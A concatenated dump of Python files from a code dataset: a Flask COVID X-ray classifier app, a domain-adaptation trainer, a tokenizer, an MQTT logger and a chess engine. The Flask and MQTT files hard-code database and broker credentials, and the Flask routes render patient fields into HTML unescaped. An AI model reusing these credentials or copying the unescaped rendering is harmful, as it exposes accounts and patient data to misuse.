distracts.\n if size == x.shape[1]:\n assert x.shape[1] == t.shape[1]\n return Samples(x, t), None, None\n\n x, remaining_x = numpy.hsplit(x, [size])\n t, remaining_t = numpy.hsplit(t, [size])\n return Samples(x, t), remaining_x, remaining_t\n","sub_path":"app/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":7698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"349979888","text":"import re\nfrom flask import render_template, request, jsonify, make_response\nfrom flask.helpers import url_for\nimport pymongo\nfrom tensorflow.keras.models import load_model\nfrom numpy.core.fromnumeric import reshape, resize\nfrom werkzeug.wrappers import response\nfrom app import app\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport io\n# import re\nimport base64\nfrom flask_pymongo import PyMongo\nfrom datetime import date, datetime\nfrom bson.objectid import ObjectId\n\napp.config[\"MONGO_URI\"] = \"mongodb+srv://somkarunmongo:phoomteay@cluster0.q3poe.mongodb.net/Chest_X_Ray\"\n\nmongo = PyMongo(app)\ndb = mongo.db\n\nimg_size = 100\n\nmodel = load_model('./model/CXR_COVID2.h5')\n\n\nlabel_dict = {0:'Covid19 Positive', 1: 'Covid19 Negative'}\n\n\ndef preprocess(img):\n img = np.array(img)\n\n if(img.ndim == 3):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n else:\n gray = img\n\n gray = gray/255\n resized = cv2.resize(gray, (img_size, img_size))\n reshaped = resized.reshape(1, img_size, img_size)\n return reshaped\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n\n@app.route('/predict', methods=[\"POST\", \"OPTIONS\"])\ndef predict():\n message = request.get_json(force=True)\n encoded = message['image']\n decoded = base64.b64decode(encoded)\n dataBytesIO = io.BytesIO(decoded)\n dataBytesIO.seek(0)\n #open image\n image = Image.open(dataBytesIO)\n #process image to AI\n test_image = preprocess(image)\n\n prediction = model.predict(test_image)\n result = np.argmax(prediction, axis=1)[0]\n accuracy = float(np.max(prediction, axis=1)[0])*100\n accuracy = \"%.2f\"%accuracy\n\n label = label_dict[result]\n\n \n\n response = {\"prediction\": {\"result\": label, \"accuracy\": accuracy}}\n\n if request.method == \"OPTIONS\": #CORS_Prefiight\n return _build_cors_prelight_response()\n elif request.method == \"POST\": #The actual request following the preflight\n # order = OrderModel.creator(....)\n return _corsify_actual_response(jsonify(response))\n else:\n raise RuntimeError(\"Weird - don't know how to handle method{}\".format(request.method)) \n\n\n\n\ndef _build_cors_prelight_response():\n response = make_response()\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n response.headers.add('Access-Control-Allow-Headers', \"*\")\n response.headers.add('Access-Control-Allow-Methods', \"*\")\n return response\n\ndef _corsify_actual_response(response):\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n@app.route('/save_data', methods=[\"POST\", \"OPTIONS\"])\ndef save_data():\n namev = request.form.get('paname') \n surnamev = request.form.get('surname')\n sexv = request.form.get('sex')\n yobv = str(request.form.get('YOB'))\n ts = datetime.now()\n atkv = request.form.get('atk')\n atk_datev = request.form.get('atk_date')\n pcrv = request.form.get('pcr')\n pcr_datev = request.form.get('pcr_date')\n\n predict_ = request.form.get('fpredict')\n probability_ = request.form.get('fprobability')\n\n \n\n\n if 'img' in request.files:\n profile_image = request.files['img']\n mongo.save_file(profile_image.filename, profile_image)\n mongo.db.users.insert({\n 'username': namev, 'surname': surnamev, 'sex': sexv, 'yob': yobv, 'predict': predict_, 'probability': probability_,\n 'save_date': ts, 'profile_image_name': profile_image.filename,\n 'atk': atkv, 'atk_date': atk_datev, 'pcr': pcrv, 'pcr_date': pcr_datev\n })\n \n return render_template('cxrlist.html')\n\n@app.route('/file/')\ndef file(filename):\n return mongo.send_file(filename)\n\n\n@app.route('/profile/')\ndef profile(username):\n user = mongo.db.users.find_one_or_404({'username': username})\n surname = user['surname']\n sex = user['sex']\n yob = user['yob']\n predict = user['predict']\n save_date = user['save_date']\n probability = user['probability']\n return f'''\n

ชื่อ: {username} นามสกุล: {surname}

\n

เพศ: {sex}

\n

ปีเกิด: {yob}

\n

วันที่บันทึก: {save_date}

\n

คาดการณ์: {predict}

\n

โอกาส(%): {probability}

\n \n '''\n\n@app.route('/showdetail/<_id>')\ndef showdetail(_id):\n \n user = mongo.db.users.find_one_or_404({'_id': ObjectId(_id)})\n username = user['username']\n surname = user['surname']\n sex = user['sex']\n yob = user['yob']\n predict = user['predict']\n atk = user['atk']\n pcr = user['pcr']\n profile_image_name = user['profile_image_name']\n probability = user['probability']\n save_date = user['save_date']\n return f'''\n\n กลับหน้าแรก\n ค้นหาข้อมูล\n\n

-----------------------------------------------------------------

\n\n

ชื่อ: {username} นามสกุล: {surname}

\n

เพศ: {sex}

\n

ปีเกิด: {yob}

\n

วันที่บันทึก: {save_date}

\n

คาดการณ์: {predict}

\n

โอกาส(%): {probability}

\n

ATK: {atk}

\n

RT-PCR: {pcr}

\n \n '''\n\n@app.route('/cxrlist')\ndef cxrlist():\n return render_template('cxrlist.html')\n\n@app.route('/manual')\ndef manual():\n return render_template('manual.html')\n\n@app.route('/findpatient', methods=[\"POST\", \"OPTIOBNS\"])\ndef findpatient():\n rname = request.form.get('rname')\n \n cxr_lists = db.users.find({'username':rname}).sort([('username', pymongo.ASCENDING),('surname', pymongo.ASCENDING), ('save_date', pymongo.ASCENDING)])\n clists = []\n sumclists = []\n vsurname = \"\"\n for cxr_list in cxr_lists:\n \n clists.append(cxr_list)\n if vsurname != cxr_list['surname']:\n sumclists.append({'username': cxr_list['username'], 'surname': cxr_list['surname']})\n\n vsurname = cxr_list['surname']\n\n \n return render_template('cxrshow.html', clists=clists, sumclists=sumclists)\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"532139254","text":"import argparse\nfrom solvers import train_init,train, train_distill\nfrom gaussian_uniform.weighted_pseudo_list import make_weighted_pseudo_list\nimport copy\nimport torch\nimport os\nimport shutil\nimport time\n\ndef main(args):\n args.log_file.write('\\n\\n########### initialization ############')\n \n # initializing\n acc, model = train_init(args)\n\n # acc = 0\n # model = torch.load(os.path.join(args.save_dir, 'initial_model.pk'))\n \n best_acc = acc\n best_model = copy.deepcopy(model)\n\n for stage in range(args.stages):\n \n print('\\n\\n########### stage : {:d}th ##############\\n\\n'.format(stage))\n args.log_file.write('\\n\\n########### stage : {:d}th ##############'.format(stage))\n \n #updating parameters of gaussian-uniform mixture model with fixed network parameters,the updated pseudo labels and \n #posterior probability of correct labeling is listed in folder \"./data/office(dataset name)/pseudo_list\"\n # make_weighted_pseudo_list(args, model)\n \n #updating network parameters with fixed gussian-uniform mixture model and pseudo labels\n acc,model = train_distill(best_model, args)\n # acc,model = train(args)\n \n if acc > best_acc:\n best_acc = acc\n best_model = copy.deepcopy(model)\n \n # torch.save(best_model,'snapshot/save/final_best_model.pk')\n print('final_best_acc:{:.4f}'.format(best_acc))\n return best_acc,best_model\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Spherical Space Domain Adaptation with Pseudo-label Loss')\n parser.add_argument('--baseline', type=str, default='MSTN', choices=['MSTN', 'DANN'])\n parser.add_argument('--gpu_id', type=str, nargs='?', default='0', help=\"device id to run\")\n parser.add_argument('--dataset',type=str,default='office')\n parser.add_argument('--source', type=str, default='amazon')\n parser.add_argument('--target',type=str,default='dslr')\n parser.add_argument('--source_list', type=str, default='data/office/amazon_list.txt', help=\"The source dataset path list\")\n parser.add_argument('--target_list', type=str, default='data/office/dslr_list.txt', help=\"The target dataset path list\")\n parser.add_argument('--test_interval', type=int, default=100, help=\"interval of two continuous test phase\")\n parser.add_argument('--snapshot_interval', type=int, default=1000, help=\"interval of two continuous output model\")\n parser.add_argument('--output_dir', type=str, default='san', help=\"output directory of our model (in ../snapshot directory)\")\n parser.add_argument('--lr', type=float, default=0.001, help=\"learning rate\")\n parser.add_argument('--num_class',type=int,default=31,help='the number of classes')\n parser.add_argument('--stages',type=int,default=0,help='the number of alternative iteration stages')\n parser.add_argument('--max_iter',type=int,default=5000)\n parser.add_argument('--batch_size',type=int,default=36)\n parser.add_argument('--mosaic_1',type=int,default=2)\n parser.add_argument('--mosaic_2',type=int,default=4)\n parser.add_argument('--lambda_e',type=float,default=0.1)\n parser.add_argument('--lambda_c',type=float,default=0.3)\n parser.add_argument('--log_file')\n args = parser.parse_args()\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_id\n save_dir = args.dataset + '_' + args.baseline + '_'+ args.output_dir\n save_dir = 'snapshot/{}/{}'.format(args.dataset, save_dir)\n # if os.path.exists(save_dir):\n # shutil.rmtree(save_dir)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n log_file = open('{}/log.txt'.format(save_dir),'w')\n log_file.write('dataset:{}\\tsource:{}\\ttarget:{}\\n\\n'\n ''.format(args.dataset,args.source,args.target))\n args.log_file = log_file\n \n \n args.save_dir = save_dir\n print(args.save_dir)\n txt_dict = {'webcam': './data/list/office/webcam_list.txt', \n 'amazon': './data/list/office/amazon_list.txt', \n 'dslr':'./data/list/office/dslr_list.txt', \n 'train':'./data/list/visda-2017/train_list.txt', \n 'validation':'./data/list/visda-2017/validation_list.txt', \n 'art':'./data/list/office-home/Art.txt',\n 'clipart':'./data/list/office-home/Clipart.txt', \n 'product':'./data/list/office-home/Product.txt', \n 'real_world':'./data/list/office-home/Real_World.txt',\n 'i': './data/list/image-clef/i_list.txt',\n 'p': './data/list/image-clef/p_list.txt',\n 'c': './data/list/image-clef/c_list.txt',\n }\n num_class_dict = {'office-home':65, 'office':31,'visda2017':12, 'image-clef':12}\n\n args.num_class = num_class_dict[args.dataset]\n args.source_list = txt_dict[args.source]\n args.target_list = txt_dict[args.target]\n print('source dataset : {}'.format(args.source_list))\n print('target dataset : {}'.format(args.target_list))\n\n with open('{}/args.txt'.format(save_dir),'w') as f:\n for eachArg, value in args.__dict__.items():\n f.writelines(eachArg + ' : ' + str(value) + '\\n')\n\n main(args)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"276111548","text":"from torchtext import vocab, data\nimport numpy as np\nfrom niklib.utils import pad_sequences\n#from torchtext.datasets import language_modeling\n#from spacy import spacy\n# Download spacy package if does not have\n#!python -m spacy download en\nimport string\nimport re\nfrom falib.text import Tokenizer\n\nclass TextProcessor(object):\n \n def __init__(self, w2v, tokenize_fn=None, max_pad=50):\n self.w2v, self.tokenize_fn, self.max_pad = w2v, tokenize_fn, max_pad\n self.re_tok = re.compile(f'([{string.punctuation}“”¨«»®´·º½¾¿¡§£₤‘’])')\n self.fastai_tok = Tokenizer()\n if tokenize_fn is None:\n TEXT = data.Field(lower=True, tokenize=self.tokenize)\n self.tokenize_fn = TEXT.preprocess\n\n def text2features(self, texts):\n if isinstance(texts, str): texts = [texts]\n tk_texts = [self.tokenize_fn(txt) for txt in texts]\n lens = np.array([len(txt) for txt in tk_texts])\n minl, maxl, meanl = lens.min(), lens.max(), lens.mean()\n print(f'Text length: min={minl}, max={maxl}, mean={meanl}')\n print(f'Padding all text to have fixed length = {self.max_pad}')\n \n xs = [[self.w2v.word2idx(word) for word in txt if self.w2v.word2idx(word) > 0] for txt in tk_texts]\n xs = pad_sequences(xs, maxlen=self.max_pad, padding='pre', truncating='post')\n xs = np.asarray(xs)\n return xs\n \n def __repr__(self):\n summary = f'Tokenize function: {self.tokenize_fn.__name__} \\n' \n summary += f'Max zero-padding len: {self.max_pad} \\n'\n return summary\n \n def split_by_punctuation(self, s): return self.re_tok.sub(r' ', s).split()\n\n def split_by_popularity(self, word):\n unknown_pop_score = self.w2v.n_vocabs\n if self.w2v.word2idx(word) > 0:\n return self.w2v.word2idx(word), [word]\n\n if len(word)<=5:\n return unknown_pop_score, [word]\n\n if (word.replace('.','',1).replace(',','',1).isdigit()):\n return unknown_pop_score, [word] # Don't care about digit\n\n best_pop_score = unknown_pop_score\n best_split = None\n best_nsplit = 3 # Max split to split\n for i_cut in range(len(word)-2, 1, -1):\n prefix, core = word[:i_cut], word[i_cut:]\n\n if self.w2v.word2idx(core) < 0:\n continue\n core_score = self.w2v.word2idx(core)\n\n if self.w2v.word2idx(prefix) < 0:\n prefix_score, prefix = self.split_by_popularity(prefix)\n else:\n prefix_score, prefix = self.w2v.word2idx(prefix), [prefix] \n if (prefix_score >= unknown_pop_score): # Don't split if all splitted words are good\n continue\n pop_score = prefix_score + core_score\n words = prefix; words.append(core)\n\n if len(words) > best_nsplit: continue # Don't split more than best_nsplit\n if (len(words) < best_nsplit) or (pop_score < best_pop_score):\n #print(prefix, prefix_score, core_score, pop_score)\n best_split = words\n best_nsplit= len(words)\n best_pop_score = pop_score\n\n if best_split is None:\n return (unknown_pop_score, [word])\n else:\n return (best_pop_score, best_split)\n\n # TODO: Add new word to w2v with random vector if can't split well\n # TODO: Remove unpopular words from w2v, add special token for numbers or irrelevant words\n \n def tokenize(self, text):\n t = self.fastai_tok.spacy_tok(text)\n new_t = []\n for word in t:\n new_t.extend(self.split_by_punctuation(word))\n t = new_t\n new_t = []\n for word in t:\n word = word.lower()\n pop_score, words = self.split_by_popularity(word)\n new_t.extend(words)\n #if self.w2v.word2idx(word) < 0:\n # print(words)\n return new_t\n\n","sub_path":"courses/nik/niklib/processor_text.py","file_name":"processor_text.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"353130057","text":"import paho.mqtt.client as mqtt\nimport json\nimport sqlite3\nfrom pprint import pprint # makes data more pretty\n\n# broker = \"46.101.13.195\" # this is our cloud server used to isolate any issues with opensenors which is more complex\nbroker = \"mqtt.opensensors.io\"\nDB_Name = \"airwatchData.db\"\nglobal cursor\n## this section is based on code from https://eclipse.org/paho/clients/python\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"/orgs/solentairwatch/sniffy\", qos=0)\n \n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n data = json.loads(msg.payload.decode('utf-8'))\n pprint(data)\n # parse the data to the sql database, prob a way to do directly from JSON, this works though\n cursor.execute('''INSERT INTO sniffy(id, timestmp, latitude, longitude, PM10, PM25, PM1)\n VALUES(?,?,?,?,?,?,?)''', (data[\"id\"], data[\"time\"], data[\"latitude\"], data[\"longitude\"], data[\"PM10\"], data[\"PM25\"], data[\"PM1\"]))\n db.commit()\n \nclient = mqtt.Client(client_id=\"6423\")\nclient.username_pw_set(\"solentairwatch\", password=\"aLmgqJPH\")\n\n# set call back functions\nclient.on_connect = on_connect\nclient.on_message = on_message\n\n# set up database connection\ndb = sqlite3.connect(DB_Name)\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS sniffy(id TEXT, timestmp TEXT,\n latitude TEXT, longitude TEXT, PM10 TEXT, PM25 TEXT, PM1 TEXT)\n''')\n\n# (address, port, timeout (sec) )\nclient.connect(broker)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nclient.loop_forever()\n\n\ndb.close() # this will never be executed because of the forever loop - need some exit logic\n","sub_path":"mqtt/subscribeMQTT.py","file_name":"subscribeMQTT.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"195973789","text":"from itertools import groupby\nfrom copy import deepcopy\n\nimport pieces\nimport re\n\nclass ChessError(Exception): pass\nclass InvalidCoord(ChessError): pass\nclass InvalidColor(ChessError): pass\nclass InvalidMove(ChessError): pass\nclass Check(ChessError): pass\nclass CheckMate(ChessError): pass\nclass Draw(ChessError): pass\nclass NotYourTurn(ChessError): pass\n\nFEN_STARTING = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1'\nRANK_REGEX = re.compile(r\"^[A-Z][1-8]$\")\n\nclass Board(dict):\n '''\n Board\n\n A simple chessboard class\n\n TODO:\n\n * PGN export\n * En passant\n * Castling\n * Promoting pawns\n * Fifty-move rule\n '''\n pawns = [[0, 0, 0, 0, 0, 0, 0, 0,],\n [50, 50, 50, 50, 50, 50, 50, 50,],\n [10, 10, 20, 30, 30, 20, 10, 10,],\n [5, 5, 10, 25, 25, 10, 5, 5,],\n [0, 0, 0, 20, 20, 0, 0, 0,],\n [5, -5,-10, 0, 0,-10, -5, 5,],\n [5, 10, 10,-20,-20, 10, 10, 5,],\n [0, 0, 0, 0, 0, 0, 0, 0]]\n\n knights =[[-50,-40,-30,-30,-30,-30,-40,-50,],\n [-40,-20, 0, 0, 0, 0,-20,-40,],\n [-30, 0, 10, 15, 15, 10, 0,-30,],\n [-30, 5, 15, 20, 20, 15, 5,-30,],\n [-30, 0, 15, 20, 20, 15, 0,-30,],\n [-30, 5, 10, 15, 15, 10, 5,-30,],\n [-40,-20, 0, 5, 5, 0,-20,-40,],\n [-50,-40,-30,-30,-30,-30,-40,-50,]]\n\n bishops =[[-20,-10,-10,-10,-10,-10,-10,-20,],\n [-10, 0, 0, 0, 0, 0, 0,-10,],\n [-10, 0, 5, 10, 10, 5, 0,-10,],\n [-10, 5, 5, 10, 10, 5, 5,-10,],\n [-10, 0, 10, 10, 10, 10, 0,-10,],\n [-10, 10, 10, 10, 10, 10, 10,-10,],\n [-10, 5, 0, 0, 0, 0, 5,-10,],\n [-20,-10,-10,-10,-10,-10,-10,-20,]]\n\n rooks = [[ 0, 0, 0, 0, 0, 0, 0, 0,],\n [5, 10, 10, 10, 10, 10, 10, 5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [-5, 0, 0, 0, 0, 0, 0, -5,],\n [0, 0, 0, 5, 5, 0, 0, 0]]\n\n\n queens = [[-20,-10,-10, -5, -5,-10,-10,-20,],\n [-10, 0, 0, 0, 0, 0, 0,-10,],\n [-10, 0, 5, 5, 5, 5, 0,-10,],\n [ -5, 0, 5, 5, 5, 5, 0, -5,],\n [ 0, 0, 5, 5, 5, 5, 0, -5,],\n [-10, 5, 5, 5, 5, 5, 0,-10,],\n [-10, 0, 5, 0, 0, 0, 0,-10,],\n [-20,-10,-10, -5, -5,-10,-10,-20]]\n\n kings = [[30,-40,-40,-50,-50,-40,-40,-30,],\n [-30,-40,-40,-50,-50,-40,-40,-30,],\n [-30,-40,-40,-50,-50,-40,-40,-30,],\n [-30,-40,-40,-50,-50,-40,-40,-30,],\n [-20,-30,-30,-40,-40,-30,-30,-20,],\n [-10,-20,-20,-20,-20,-20,-20,-10,],\n [20, 20, 0, 0, 0, 0, 20, 20,],\n [20, 30, 10, 0, 0, 10, 30, 20]]\n\n\n\n\n axis_y = ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')\n axis_x = tuple(range(1,9)) # (1,2,3,...8)\n\n captured_pieces = { 'white': [], 'black': [] }\n player_turn = None\n castling = '-'\n en_passant = '-'\n halfmove_clock = 0\n fullmove_number = 1\n history = []\n\n def __init__(self, fen = None):\n if fen is None: self.load(FEN_STARTING)\n else: self.load(fen)\n\n def __getitem__(self, coord):\n if isinstance(coord, str):\n coord = coord.upper()\n if not re.match(RANK_REGEX, coord.upper()): raise KeyError\n elif isinstance(coord, tuple):\n coord = self.letter_notation(coord)\n try:\n return super(Board, self).__getitem__(coord)\n except KeyError:\n return None\n\n def save_to_file(self): pass\n\n def is_in_check_after_move(self, p1, p2):\n # Create a temporary board\n tmp = deepcopy(self)\n tmp._do_move(p1,p2)\n return tmp.is_in_check(self[p1].color)\n\n\n def computer_move(self,color):\n\n if(color not in (\"black\", \"white\")): raise InvalidColor\n\n [action,value] = self.alphaBeta(-1000000,+1000000,3,color)\n p1 = action[0] #initial position\n p2 = action[1] #final position\n self.move(p1,p2) \n\n\n def evaluate(self,color):\n val = 0\n antival = 0\n mobility = 0\n sqval = 0\n sqantival = 0\n\n color = \"black\"\n enemy = self.get_enemy(color)\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color: \n val += self[coord].weight\n if self[coord].abbriviation=='p':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+= self.pawns[t1][t2]\n elif self[coord].abbriviation=='n':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.knights[t1][t2]\n elif self[coord].abbriviation=='r':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.rooks[t1][t2]\n elif self[coord].abbriviation=='b':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.bishops[t1][t2]\n elif self[coord].abbriviation=='q':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.queens[t1][t2]\n elif self[coord].abbriviation=='k':\n t1 = ord(coord[0])-65\n t2 = 8 - int(coord[1])\n sqval+=self.kings[t1][t2]\n\n if (self[coord] is not None) and self[coord].color == enemy: \n antival += self[coord].weight \n #if self[coord].abbriviation=='p':\n # sqantival+=1 \n #elif self[coord].abbriviation=='n':\n # sqantival+=1\n #elif self[coord].abbriviation=='r':\n # sqantival+=1\n #elif self[coord].abbriviation=='b':\n # sqantival+=1\n #elif self[coord].abbriviation=='q':\n # sqantival+=1\n #elif self[coord].abbriviation=='k':\n # sqantival+= 1 \n #mobility += len(self.all_possible_moves(color))\n\n return (val-antival)+sqval \n\n\n\n def evaluate2(self,color):\n val = 0\n antival = 0\n mobility = 0\n\n\n\n color = \"black\"\n enemy = self.get_enemy(color)\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color: \n val += self[coord].weight\n if (self[coord] is not None) and self[coord].color == enemy: \n antival += self[coord].weight \n #mobility += len(self.all_possible_moves(color))\n\n\n return val-antival \n\n def alphaBeta(self,alpha,beta,depthleft,color):\n if (depthleft == 0):\n if(color == \"black\"):\n return [[], self.evaluate(color)]\n else:\n return [[], -self.evaluate(color)] \n\n enemy = self.get_enemy(color)\n\n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n bestscore = -1000000\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(-beta,-alpha,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n score = -tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n\n if score >= beta: #fail-hard beta-cutoff\n return [action,score]\n\n if score > bestscore: #alpha acts like max in minimax\n bestscore = score\n bestAction = action\n\n if score > alpha:\n alpha = score \n \n return[bestAction,bestscore] \n\n\n\n def alphaBetaMax(self,alpha,beta,depthleft,color):\n if depthleft == 0:\n return [[], self.evaluate(color)]\n\n enemy = self.get_enemy(color)\n \n\n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n score = tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n\n if score >= beta: #fail-hard beta-cutoff\n return [action,beta]\n\n if score > alpha: #alpha acts like max in minimax\n alpha = score\n bestAction = action \n \n return[bestAction,alpha] \n\n def alphaBetaMin(self,alpha,beta,depthleft,color):\n if depthleft == 0:\n return [[], -self.evaluate(color)]\n\n enemy = self.get_enemy(color)\n \n actions = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n for move in moves:\n actions.append([coord,move])\n\n bestAction = []\n for action in actions:\n temp = deepcopy(self)\n p1 = action[0]\n p2 = action[1]\n temp._do_move(p1,p2)\n #self._do_move(p1,p2)\n tt = temp.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #tt = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n\n score = tt[1]\n #[[],score] = self.alphaBetaMin(alpha,beta,depthleft - 1,enemy)\n #self._undo_move(p1,p2)\n if score <= alpha: #fail-hard alpha cutoff\n return [action,alpha]\n\n if score < beta: #beta acts like min in minimax\n beta = score\n bestAction = action \n \n return[bestAction,beta] \n \n def move(self, p1, p2):\n p1, p2 = p1.upper(), p2.upper()\n piece = self[p1]\n dest = self[p2]\n\n if (self[p1] is None):\n raise InvalidMove\n\n # print(\"1\", self[p1], piece.color)\n # print(\"2\", self[p2])\n\n # print(\"here we go sir\",self)\n\n if self.player_turn != piece.color:\n raise NotYourTurn(\"Not \" + piece.color + \"'s turn!\")\n\n enemy = self.get_enemy(piece.color)\n possible_moves = piece.possible_moves(p1)\n # 0. Check if p2 is in the possible moves\n if p2 not in possible_moves:\n raise InvalidMove\n\n #print(\"Possible Moves are\", possible_moves)\n\n # If enemy has any moves look for check\n if self.all_possible_moves(enemy):\n #x = self.all_possible_moves(enemy)\n #print(\"x is\")\n #print(x)\n if self.is_in_check_after_move(p1,p2):\n raise Check\n\n if not possible_moves and self.is_in_check(piece.color):\n raise CheckMate\n elif not possible_moves:\n raise Draw\n else:\n self._do_move(p1, p2)\n self._finish_move(piece, dest, p1,p2)\n\n def get_enemy(self, color):\n if color == \"white\": return \"black\"\n else: return \"white\"\n\n def _do_move(self, p1, p2):\n '''\n Move a piece without validation\n '''\n piece = self[p1]\n dest = self[p2]\n del self[p1]\n self[p2] = piece\n\n def _undo_move(self, p1,p2):\n '''\n Undo a Move\n\n '''\n piece = self[p2]\n dest = self[p1]\n del self[p2]\n self[p1] = piece \n\n def _finish_move(self, piece, dest, p1, p2):\n '''\n Set next player turn, count moves, log moves, etc.\n '''\n enemy = self.get_enemy(piece.color)\n if piece.color == 'black':\n self.fullmove_number += 1\n self.halfmove_clock +=1\n self.player_turn = enemy\n abbr = piece.abbriviation\n if abbr == 'P':\n # Pawn has no letter\n abbr = ''\n # Pawn resets halfmove_clock\n self.halfmove_clock = 0\n if dest is None:\n # No capturing\n movetext = abbr + p2.lower()\n else:\n # Capturing\n movetext = abbr + 'x' + p2.lower()\n # Capturing resets halfmove_clock\n self.halfmove_clock = 0\n\n self.history.append(movetext)\n\n\n def all_possible_moves(self, color):\n '''\n Return a list of `color`'s possible moves.\n Does not check for check.\n '''\n if(color not in (\"black\", \"white\")): raise InvalidColor\n result = []\n for coord in self.keys():\n if (self[coord] is not None) and self[coord].color == color:\n moves = self[coord].possible_moves(coord)\n if moves: result += moves\n\n # print(result) \n return result\n\n def occupied(self, color):\n '''\n Return a list of coordinates occupied by `color`\n '''\n result = []\n if(color not in (\"black\", \"white\")): raise InvalidColor\n\n for coord in self:\n if self[coord].color == color:\n result.append(coord)\n return result\n\n def is_king(self, piece):\n return isinstance(piece, pieces.King)\n\n\n def get_king_position(self, color):\n for pos in self.keys():\n if self.is_king(self[pos]) and self[pos].color == color:\n return pos\n\n def get_king(self, color):\n if(color not in (\"black\", \"white\")): raise InvalidColor\n return self[self.get_king_position(color)]\n\n def is_in_check(self, color):\n if(color not in (\"black\", \"white\")): raise InvalidColor\n king = self.get_king(color)\n enemy = self.get_enemy(color)\n return king in map(self.__getitem__, self.all_possible_moves(enemy))\n\n def letter_notation(self,coord):\n if not self.is_in_bounds(coord): return\n try:\n return self.axis_y[coord[1]] + str(self.axis_x[coord[0]])\n except IndexError:\n raise InvalidCoord\n\n def number_notation(self, coord):\n return int(coord[1])-1, self.axis_y.index(coord[0])\n\n def is_in_bounds(self, coord):\n if coord[1] < 0 or coord[1] > 7 or\\\n coord[0] < 0 or coord[0] > 7:\n return False\n else: return True\n\n def load(self, fen):\n '''\n Import state from FEN notation\n '''\n self.clear()\n # Split data\n fen = fen.split(' ')\n # Expand blanks\n def expand(match): return ' ' * int(match.group(0))\n\n fen[0] = re.compile(r'\\d').sub(expand, fen[0])\n\n for x, row in enumerate(fen[0].split('/')):\n for y, letter in enumerate(row):\n if letter == ' ': continue\n coord = self.letter_notation((7-x,y))\n self[coord] = pieces.piece(letter)\n self[coord].place(self)\n\n if fen[1] == 'w': self.player_turn = 'white'\n else: self.player_turn = 'black'\n\n self.castling = fen[2]\n self.en_passant = fen[3]\n self.halfmove_clock = int(fen[4])\n self.fullmove_number = int(fen[5])\n\n def export(self):\n '''\n Export state to FEN notation\n '''\n def join(k, g):\n if k == ' ': return str(len(g))\n else: return \"\".join(g)\n\n def replace_spaces(row):\n # replace spaces with their count\n result = [join(k, list(g)) for k,g in groupby(row)]\n return \"\".join(result)\n\n\n result = ''\n for number in self.axis_x[::-1]:\n for letter in self.axis_y:\n piece = self[letter+str(number)]\n if piece is not None:\n result += piece.abbriviation\n else: result += ' '\n result += '/'\n\n result = result[:-1] # remove trailing \"/\"\n result = replace_spaces(result)\n result += \" \" + (\" \".join([self.player_turn[0],\n self.castling,\n 